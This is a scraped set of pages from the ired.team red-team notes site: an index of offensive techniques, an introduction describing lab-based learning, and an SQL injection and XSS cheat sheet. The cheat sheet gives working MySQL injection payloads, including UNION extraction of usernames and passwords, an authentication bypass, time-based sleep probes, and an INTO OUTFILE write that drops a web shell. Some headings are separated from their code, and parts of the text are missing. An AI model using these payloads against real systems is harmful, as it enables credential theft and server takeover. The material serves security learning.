# Table of Contents
- [What is ired.team notes? | Red Team Notes](#what-is-ired-team-notes-red-team-notes)
- [Active Directory & Kerberos Abuse | Red Team Notes](#active-directory-kerberos-abuse-red-team-notes)
- [SQL Injection & XSS Playground | Red Team Notes](#sql-injection-xss-playground-red-team-notes)
- [Kerberos: Golden Tickets | Red Team Notes](#kerberos-golden-tickets-red-team-notes)
- [Kerberoasting: Requesting RC4 Encrypted TGS when AES is Enabled | Red Team Notes](#kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled-red-team-notes)
- [AS-REP Roasting | Red Team Notes](#as-rep-roasting-red-team-notes)
- [Kerberos: Silver Tickets | Red Team Notes](#kerberos-silver-tickets-red-team-notes)
- [Kerberos Unconstrained Delegation | Red Team Notes](#kerberos-unconstrained-delegation-red-team-notes)
- [Kerberoasting | Red Team Notes](#kerberoasting-red-team-notes)
- [Kerberos Constrained Delegation | Red Team Notes](#kerberos-constrained-delegation-red-team-notes)
- [From Domain Admin to Enterprise Admin | Red Team Notes](#from-domain-admin-to-enterprise-admin-red-team-notes)
- [Initial Access | Red Team Notes](#initial-access-red-team-notes)
- [Red Team Infrastructure | Red Team Notes](#red-team-infrastructure-red-team-notes)
- [Spiderfoot 101 with Kali using Docker | Red Team Notes](#spiderfoot-101-with-kali-using-docker-red-team-notes)
- [Pentesting Cheatsheets | Red Team Notes](#pentesting-cheatsheets-red-team-notes)
- [DCShadow - Becoming a Rogue Domain Controller | Red Team Notes](#dcshadow-becoming-a-rogue-domain-controller-red-team-notes)
- [HTTP Forwarders / Relays | Red Team Notes](#http-forwarders-relays-red-team-notes)
- [Kerberos Resource-based Constrained Delegation: Computer Object Takeover | Red Team Notes](#kerberos-resource-based-constrained-delegation-computer-object-takeover-red-team-notes)
- [Phishing with Modlishka Reverse HTTP Proxy | Red Team Notes](#phishing-with-modlishka-reverse-http-proxy-red-team-notes)
- [Code Execution | Red Team Notes](#code-execution-red-team-notes)
- [Domain Compromise via DC Print Server and Kerberos Delegation | Red Team Notes](#domain-compromise-via-dc-print-server-and-kerberos-delegation-red-team-notes)
- [Phishing with MS Office | Red Team Notes](#phishing-with-ms-office-red-team-notes)
- [NetNTLMv2 hash stealing using Outlook | Red Team Notes](#netntlmv2-hash-stealing-using-outlook-red-team-notes)
- [Unknown](#unknown)
- [regsvr32 | Red Team Notes](#regsvr32-red-team-notes)
- [Password Spraying Outlook Web Access: Remote Shell | Red Team Notes](#password-spraying-outlook-web-access-remote-shell-red-team-notes)
- [T1173: Phishing - DDE | Red Team Notes](#t1173-phishing-dde-red-team-notes)
- [Phishing with GoPhish and DigitalOcean | Red Team Notes](#phishing-with-gophish-and-digitalocean-red-team-notes)
- [Phishing: .SLK Excel | Red Team Notes](#phishing-slk-excel-red-team-notes)
- [Phishing: Embedded HTML Forms | Red Team Notes](#phishing-embedded-html-forms-red-team-notes)
- [SMTP Forwarders / Relays | Red Team Notes](#smtp-forwarders-relays-red-team-notes)
- [Phishing: XLM / Macro 4.0 | Red Team Notes](#phishing-xlm-macro-4-0-red-team-notes)
- [Phishing: Embedded Internet Explorer | Red Team Notes](#phishing-embedded-internet-explorer-red-team-notes)
- [Active Directory Enumeration with AD Module without RSAT or Admin Privileges | Red Team Notes](#active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges-red-team-notes)
- [MSHTA | Red Team Notes](#mshta-red-team-notes)
- [pubprn.vbs Signed Script Code Execution | Red Team Notes](#pubprn-vbs-signed-script-code-execution-red-team-notes)
- [Forfiles Indirect Command Execution | Red Team Notes](#forfiles-indirect-command-execution-red-team-notes)
- [Powershell Empire 101 | Red Team Notes](#powershell-empire-101-red-team-notes)
- [PowerView: Active Directory Enumeration | Red Team Notes](#powerview-active-directory-enumeration-red-team-notes)
- [Backdooring AdminSDHolder for Persistence | Red Team Notes](#backdooring-adminsdholder-for-persistence-red-team-notes)
- [DCSync: Dump Password Hashes from Domain Controller | Red Team Notes](#dcsync-dump-password-hashes-from-domain-controller-red-team-notes)
- [Inject Macros from a Remote Dotm Template | Red Team Notes](#inject-macros-from-a-remote-dotm-template-red-team-notes)
- [Powershell Without Powershell.exe | Red Team Notes](#powershell-without-powershell-exe-red-team-notes)
- [Pass the Hash with Machine$ Accounts | Red Team Notes](#pass-the-hash-with-machine-accounts-red-team-notes)
- [Active Directory Password Spraying | Red Team Notes](#active-directory-password-spraying-red-team-notes)
- [CMSTP | Red Team Notes](#cmstp-red-team-notes)
- [T1137: Phishing - Office Macros | Red Team Notes](#t1137-phishing-office-macros-red-team-notes)
- [Application Whitelisting Bypass with WMIC and XSL | Red Team Notes](#application-whitelisting-bypass-with-wmic-and-xsl-red-team-notes)
- [Powershell Constrained Language Mode Bypass | Red Team Notes](#powershell-constrained-language-mode-bypass-red-team-notes)
- [Control Panel Item | Red Team Notes](#control-panel-item-red-team-notes)
- [Phishing: OLE + LNK | Red Team Notes](#phishing-ole-lnk-red-team-notes)
- [Code Execution through Control Panel Add-ins | Red Team Notes](#code-execution-through-control-panel-add-ins-red-team-notes)
- [Executing Code as a Control Panel Item through an Exported Cplapplet Function | Red Team Notes](#executing-code-as-a-control-panel-item-through-an-exported-cplapplet-function-red-team-notes)
- [Active Directory Lab with Hyper-V and PowerShell | Red Team Notes](#active-directory-lab-with-hyper-v-and-powershell-red-team-notes)
- [Cobalt Strike 101 | Red Team Notes](#cobalt-strike-101-red-team-notes)
- [Enumerating AD Object Permissions with dsacls | Red Team Notes](#enumerating-ad-object-permissions-with-dsacls-red-team-notes)
- [Using MSBuild to Execute Shellcode in C# | Red Team Notes](#using-msbuild-to-execute-shellcode-in-c-red-team-notes)
- [Forced Authentication | Red Team Notes](#forced-authentication-red-team-notes)
- [BloodHound with Kali Linux: 101 | Red Team Notes](#bloodhound-with-kali-linux-101-red-team-notes)
- [InstallUtil | Red Team Notes](#installutil-red-team-notes)
- [Automating Red Team Infrastructure with Terraform | Red Team Notes](#automating-red-team-infrastructure-with-terraform-red-team-notes)
- [Abusing Trust Account$: Accessing Resources on a Trusted Domain from a Trusting Domain | Red Team Notes](#abusing-trust-account-accessing-resources-on-a-trusted-domain-from-a-trusting-domain-red-team-notes)
- [From Misconfigured Certificate Template to Domain Admin | Red Team Notes](#from-misconfigured-certificate-template-to-domain-admin-red-team-notes)
- [From DnsAdmins to SYSTEM to Domain Compromise | Red Team Notes](#from-dnsadmins-to-system-to-domain-compromise-red-team-notes)
- [Forcing Iexplore.exe to Load a Malicious DLL via COM Abuse | Red Team Notes](#forcing-iexplore-exe-to-load-a-malicious-dll-via-com-abuse-red-team-notes)
- [Shadow Credentials | Red Team Notes](#shadow-credentials-red-team-notes)
- [Code & Process Injection | Red Team Notes](#code-process-injection-red-team-notes)
- [Shellcode Execution via CreateThreadpoolWait | Red Team Notes](#shellcode-execution-via-createthreadpoolwait-red-team-notes)
- [Shellcode Reflective DLL Injection | Red Team Notes](#shellcode-reflective-dll-injection-red-team-notes)
- [Bypassing Parent Child / Ancestry Detections | Red Team Notes](#bypassing-parent-child-ancestry-detections-red-team-notes)
- [DLL Injection | Red Team Notes](#dll-injection-red-team-notes)
- [Shellcode Execution through Fibers | Red Team Notes](#shellcode-execution-through-fibers-red-team-notes)
- [Loading and Executing Shellcode From PE Resources | Red Team Notes](#loading-and-executing-shellcode-from-pe-resources-red-team-notes)
- [Local Shellcode Execution without Windows APIs | Red Team Notes](#local-shellcode-execution-without-windows-apis-red-team-notes)
- [Process Doppelganging | Red Team Notes](#process-doppelganging-red-team-notes)
- [Early Bird APC Queue Code Injection | Red Team Notes](#early-bird-apc-queue-code-injection-red-team-notes)
- [Abusing Active Directory ACLs/ACEs | Red Team Notes](#abusing-active-directory-acls-aces-red-team-notes)
- [Executing Shellcode with Inline Assembly in C/C++ | Red Team Notes](#executing-shellcode-with-inline-assembly-in-c-c-red-team-notes)
- [Shellcode Execution in a Local Process with QueueUserAPC and NtTestAlert | Red Team Notes](#shellcode-execution-in-a-local-process-with-queueuserapc-and-nttestalert-red-team-notes)
- [Defense Evasion | Red Team Notes](#defense-evasion-red-team-notes)
- [Phishing: Replacing Embedded Video with Bogus Payload | Red Team Notes](#phishing-replacing-embedded-video-with-bogus-payload-red-team-notes)
- [SetWindowHookEx Code Injection | Red Team Notes](#setwindowhookex-code-injection-red-team-notes)
- [Binary Exploitation | Red Team Notes](#binary-exploitation-red-team-notes)
- [CreateRemoteThread Shellcode Injection | Red Team Notes](#createremotethread-shellcode-injection-red-team-notes)
- [Privileged Accounts and Token Privileges | Red Team Notes](#privileged-accounts-and-token-privileges-red-team-notes)
- [AddressOfEntryPoint Code Injection without VirtualAllocEx RWX | Red Team Notes](#addressofentrypoint-code-injection-without-virtualallocex-rwx-red-team-notes)
- [NtCreateSection + NtMapViewOfSection Code Injection | Red Team Notes](#ntcreatesection-ntmapviewofsection-code-injection-red-team-notes)
- [Injecting to Remote Process via Thread Hijacking | Red Team Notes](#injecting-to-remote-process-via-thread-hijacking-red-team-notes)
- [APC Queue Code Injection | Red Team Notes](#apc-queue-code-injection-red-team-notes)
- [DLL Injection via a Custom .NET Garbage Collector | Red Team Notes](#dll-injection-via-a-custom-net-garbage-collector-red-team-notes)
- [Windows API Hooking | Red Team Notes](#windows-api-hooking-red-team-notes)
- [PE Injection: Executing PEs inside Remote Processes | Red Team Notes](#pe-injection-executing-pes-inside-remote-processes-red-team-notes)
- [Module Stomping for Shellcode Injection | Red Team Notes](#module-stomping-for-shellcode-injection-red-team-notes)
- [Injecting .NET Assembly to an Unmanaged Process | Red Team Notes](#injecting-net-assembly-to-an-unmanaged-process-red-team-notes)
- [Evading Windows Defender with 1 Byte Change | Red Team Notes](#evading-windows-defender-with-1-byte-change-red-team-notes)
- [Enumeration and Discovery | Red Team Notes](#enumeration-and-discovery-red-team-notes)
- [Privilege Escalation | Red Team Notes](#privilege-escalation-red-team-notes)
- [Exfiltration | Red Team Notes](#exfiltration-red-team-notes)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
- [Unknown](#unknown)
---
# What is ired.team notes? | Red Team Notes
For the complete documentation index, see [llms.txt](https://www.ired.team/llms.txt)
. This page is also available as [Markdown](https://www.ired.team/readme.md)
.
This is publicly accessible personal red teaming notes at [https://ired.team](https://ired.team/)
and [https://github.com/mantvydasb/RedTeam-Tactics-and-Techniques](https://github.com/mantvydasb/RedTeam-Tactics-and-Techniques)
about my pentesting / red teaming experiments in a controlled environment that involve playing with various tools and techniques used by penetration testers, red teams and actual adversaries.
This is my way of learning things - by doing, following, tinkering, exploring, repeating and taking notes.
At ired.team, I explore some of the common offensive security techniques involving gaining code execution, code injection, defense evasion, lateral movement, persistence and more.
Most of these techniques are discovered by other security researchers and I do not claim their ownership. I try to reference the sources I use the best I can, but if you think I've missed something, please get in touch and I will fix it immediately.
* Do not take everything or anything in these notes for **granted.**
* Do not expect the notes to be exhaustive or covering the techniques or the artifacts they produce in full.
* Expect mistakes in the notes.
* Always consult additional resources.
**Warning** [ired.team](https://ired.team/)
Red Teaming Experiments GitBook is created by [@spotheplanet](https://twitter.com/spotheplanet)
. Cloning it and presenting it as your own is illegal and strictly forbidden, don't do it.
**Support and Donations**
If you appreciate ired.team and would like to show support, you can do it via my:
* [Patreon](http://patreon.com/iredteam)
* paypal mantvydo@gmail.com
[](https://www.ired.team/#the-goal)
The Goal
-------------------------------------------------
The goal of this project is simple - read other researchers work, execute some common/uncommon attacking techniques in a lab environment, do my own reasearch and:
* understand how various cyber attacks and techniques can be executed and how they work
* learn about how malware is written
* write code to further understand the tools and techniques used by attackers and malware authors
* learn more about C++, Windows internals and Windows APIs
* see what artifacts the techniques and tools leave behind on the endpoint
* try out various industry tools for pentesting, coding, debugging, reverse engineering, malware analysis, and become more profficient in using them
* take notes for future reference
Follow me on twitter:
[spotheplanet (@spotheplanet) on XX](https://twitter.com/spotheplanet)
[NextPentesting Cheatsheets](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets)
Last updated 1 year ago
---
# Active Directory & Kerberos Abuse | Red Team Notes
For the complete documentation index, see [llms.txt](https://www.ired.team/llms.txt)
. This page is also available as [Markdown](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse.md)
.
[From Domain Admin to Enterprise Admin](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain)
[Kerberoasting](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting)
[Kerberos: Golden Tickets](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets)
[Kerberos: Silver Tickets](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets)
[AS-REP Roasting](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)
[Kerberoasting: Requesting RC4 Encrypted TGS when AES is Enabled](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled)
[Kerberos Unconstrained Delegation](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation)
[Kerberos Constrained Delegation](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation)
[Kerberos Resource-based Constrained Delegation: Computer Object Takeover](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution)
[Domain Compromise via DC Print Server and Kerberos Delegation](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation)
[DCShadow - Becoming a Rogue Domain Controller](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1207-creating-rogue-domain-controllers-with-dcshadow)
[DCSync: Dump Password Hashes from Domain Controller](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync)
[PowerView: Active Directory Enumeration](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-powerview)
[Abusing Active Directory ACLs/ACEs](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces)
[Privileged Accounts and Token Privileges](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges)
[From DnsAdmins to SYSTEM to Domain Compromise](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise)
[Pass the Hash with Machine$ Accounts](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/pass-the-hash-with-machine-accounts)
[BloodHound with Kali Linux: 101](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux)
[Backdooring AdminSDHolder for Persistence](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence)
[Active Directory Enumeration with AD Module without RSAT or Admin Privileges](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges)
[Enumerating AD Object Permissions with dsacls](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions)
[Active Directory Password Spraying](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying)
[Active Directory Lab with Hyper-V and PowerShell](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-lab-with-hyper-v-and-powershell)
[ADCS + PetitPotam NTLM Relay: Obtaining krbtgt Hash with Domain Controller Machine Certificate](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/adcs-+-petitpotam-ntlm-relay-obtaining-krbtgt-hash-with-domain-controller-machine-certificate)
[From Misconfigured Certificate Template to Domain Admin](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-misconfigured-certificate-template-to-domain-admin)
[Shadow Credentials](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials)
[Abusing Trust Account$: Accessing Resources on a Trusted Domain from a Trusting Domain](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-trust-accountusd-accessing-resources-on-a-trusted-domain-from-a-trusting-domain)
[PreviousSQL Injection & XSS Playground](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground)
[NextFrom Domain Admin to Enterprise Admin](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain)
Last updated 7 years ago
---
# SQL Injection & XSS Playground | Red Team Notes
For the complete documentation index, see [llms.txt](https://www.ired.team/llms.txt)
. This page is also available as [Markdown](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground.md)
.
[](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground#classic-sql-injection)
Classic SQL Injection
---------------------------------------------------------------------------------------------------------------------------------------------------------------------
###
[](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground#union-select-data-extraction)
Union Select Data Extraction
Copy
mysql> select * from users where user_id = 1 order by 7;
ERROR 1054 (42S22): Unknown column '7' in 'order clause'
mysql> select * from users where user_id = 1 order by 6;
mysql> select * from users where user_id = 1 union select 1,2,3,4,5,6;


###
[](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground#authentication-bypass)
Authentication Bypass

###
[](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground#second-order-injection)
Second Order Injection

###
[](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground#dropping-a-backdoor)
Dropping a Backdoor

###
[](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground#conditional-select)
Conditional Select

###
[](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground#bypassing-whitespace-filtering)
Bypassing Whitespace Filtering

[](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground#time-based-sql-injection)
Time Based SQL Injection
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
###
[](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground#sleep-invokation)
Sleep Invokation


[](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground#xss)
XSS
---------------------------------------------------------------------------------------------------------------------------------

###
[](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground#strtoupper-bypass)
Strtoupper Bypass
Say we have the following PHP code that takes `name` as a user supplied parameter:
Line 3 is vulnerable to XSS, and we can break out of the input with a single quote `'`:
For example, if we set the `name` parameter to the value of `a'`, we get:

Note that the `a` got converted to a capital `A` and this is due to the `strtoupper` function being called on our input. What this means is that any ascii letters in our JavaScript payload will get converted to uppercase and become invalid and will not execute (i.e`alert() != ALERT()`).
To bypass this constraint, we can encode our payload using JsFuck, which eliminates all the letters from the payload and leaves us with this:

[](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground#references)
References
-----------------------------------------------------------------------------------------------------------------------------------------------
[MySQL SQL Injection Cheat Sheetpentestmonkey](http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
[MSSQL Injection Cheat Sheetpentestmonkey](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
[http://breakthesecurity.cysecurity.org/2010/12/hacking-website-using-sql-injection-step-by-step-guide.htmlbreakthesecurity.cysecurity.org](http://breakthesecurity.cysecurity.org/2010/12/hacking-website-using-sql-injection-step-by-step-guide.html)
[PreviousPentesting Cheatsheets](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets)
[NextActive Directory & Kerberos Abuse](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse)
Last updated 7 years ago
* [Classic SQL Injection](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground#classic-sql-injection)
* [Union Select Data Extraction](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground#union-select-data-extraction)
* [Authentication Bypass](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground#authentication-bypass)
* [Second Order Injection](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground#second-order-injection)
* [Dropping a Backdoor](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground#dropping-a-backdoor)
* [Conditional Select](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground#conditional-select)
* [Bypassing Whitespace Filtering](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground#bypassing-whitespace-filtering)
* [Time Based SQL Injection](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground#time-based-sql-injection)
* [Sleep Invokation](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground#sleep-invokation)
* [XSS](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground#xss)
* [Strtoupper Bypass](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground#strtoupper-bypass)
* [References](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground#references)
Copy
select * from users where user_id = 1 union all select 1,(select group_concat(user,0x3a,password) from users),3,4,5,6;
Copy
mysql> select * from users where user='admin' and password='blah' or 1 # 5f4dcc3b5aa765d61d8327deb882cf99'
Copy
mysql> insert into accounts (username, password, mysignature) values ('admin','mynewpass',(select user())) # 'mynewsignature');
Copy
mysql> select * from users where user_id = 1 union select all 1,2,3,4,"",6 into outfile "/var/www/dvwa/shell.php" #;
Copy
mysql> select * from users where user = (select concat((select if(1>0,'adm','b')),"in"));
Copy
mysql> select * from users where user_id = 1/**/union/**/select/**/all/**/1,2,3,4,5,6;
Copy
mysql> select * from users where user_id = 1 or (select sleep(1)+1);
Copy
select * from users where user_id = 1 union select 1,2,3,4,5,sleep(1);
Copy
Copy
';
echo "First name: ";
echo "";
echo "